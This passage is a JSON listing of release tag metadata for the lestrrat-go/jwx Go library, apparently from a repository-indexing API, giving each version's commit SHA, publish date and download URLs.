2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestr